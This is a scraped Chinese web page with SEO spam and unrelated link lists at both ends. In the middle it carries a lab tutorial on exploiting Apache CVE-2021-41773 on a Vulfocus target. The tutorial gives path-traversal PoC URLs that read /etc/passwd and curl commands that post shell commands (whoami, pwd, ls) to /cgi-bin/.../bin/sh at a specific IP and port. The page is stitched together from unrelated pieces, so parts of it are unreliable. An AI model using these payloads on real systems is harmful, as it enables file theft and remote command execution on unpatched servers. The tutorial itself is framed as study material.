当前位置: 首页 > news >正文

天元建设集团有限公司青岛分公司张德平不干了温州网站排名优化

天元建设集团有限公司青岛分公司张德平不干了,温州网站排名优化,简单电子商务网站建设,京东网站是哪个公司做的本文仅作为学习参考使用#xff0c;本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞#xff08;cve_2021_41773#xff09;。 靶场链接#xff1a;Vulfocus 漏洞威胁分析平台 一#xff0c;漏洞简介。 cve_2021_41773漏洞…本文仅作为学习参考使用本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞cve_2021_41773。 靶场链接Vulfocus 漏洞威胁分析平台 一漏洞简介。 cve_2021_41773漏洞是一个目录穿越的高危漏洞主要影响版本有Apache阿帕奇 2.4.49 和 Apache 2.4.50其对路径规范化所做的更改中存在一个路径穿越漏洞攻击者可利用该漏洞读取到Web目录外的其他文件如系统配置文件、网站源码等甚至在特定情况下攻击者可构造恶意请求执行命令控制服务器。 二poc。 具体poc已给出 get传参方式poc为 /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd可以看到是一段经过了url编码的内容解密后为 2post传参 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 经过两次url解码后结果为 三漏洞利用。 打开靶场连接后可以发现是一个阿帕奇服务的默认界面。 通过抓包后发现传参方式为get 此处使用get传参的poc。 进行攻击测试poc填写到红框内 可以看到回显为修改请求头所读的敏感信息。 此处为什么要用burp因为浏览器自动对路径进行了一次url解码用burp发送过去的请求不会被自动解码 ‍四rce。 1查看敏感文件。 在kali上使用curl 命令进⾏进一步渗透工作。 读取敏感文件的命令为 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd ① [ip] 替换成被攻击服务器的 IP。 ② port 替换为被攻击服务器端⼝。 curl简介Linux命令行工具curl详解与服务器之间传输数据_curl socks5代理-CSDN博客 2通用操作。  具体格式为 curl --data echo;shell http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 替换shell为想要执行的命令。 取得敏感信息查询一下当前用户 curl --data echo;whoami http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 查看一下当前目录 curl --data echo;pwd http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 获取flag curl --data echo;ls /tmp http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
http://www.hkea.cn/news/14257525/

相关文章:

  • 无锡网站建设 推荐无锡立威云商wordpress网站无法登陆
  • 个人网站建设怎么样广州做公司网站的公司有哪些
  • 网站开发项目付款方式湘潭做网站品牌磐石网络
  • 济南网站建设(选聚搜网络)wordpress七牛云镜像
  • 网站运营一般做那些分析口碑营销名词解释
  • 注册网站要注意什么做移动网站快速排
  • 台州网站建设公司哪个好网站制作需要什么人员
  • 营销网站建设创意wordpress底部美化
  • 网站建设设计文档模板怎么帮别人做网站
  • 建设工程人才招聘信息网站wordpress 时间轴插件
  • 谁可以做网站优化排名推广做网站网站被抓没盈利
  • 租网站需要多少钱网站建设多少钱比较合适
  • 网站建设时间计划书互联网平台公司有哪些
  • 效果图网站密码破解网站建设的目标是什么?提供了哪些栏目?
  • 正规刷手机单做任务网站海口网站建设呢
  • 企业网站建设价钱修改wordpress 表格
  • 自建微网站服务器旅游网站建设受众分析
  • 网站备案掉了海口网站制作
  • 枣阳网站开发公司哪家好网站建设如何财务处理
  • 网站网页策略上线一个网站需要多少钱
  • 常州专业网站建设公司咨询wordpress会员插件
  • wordpress搭建英文网站打开小程序入口直接进入
  • 罗湖医院网站建设商洛网站建设公司电话
  • 做外贸网站公司网站源码什么意思
  • 网站设计原型图怎么做网站建设套餐怎么样
  • php 企业网站管理系统免费学编程国内网站
  • 凤翔做网站wordpress getshell
  • 手机版网站设计广西网站建设公司电话
  • 怎么做网站代拍常州网站建设公司排名
  • 广州市黄埔区建设局网站缙云 网站建设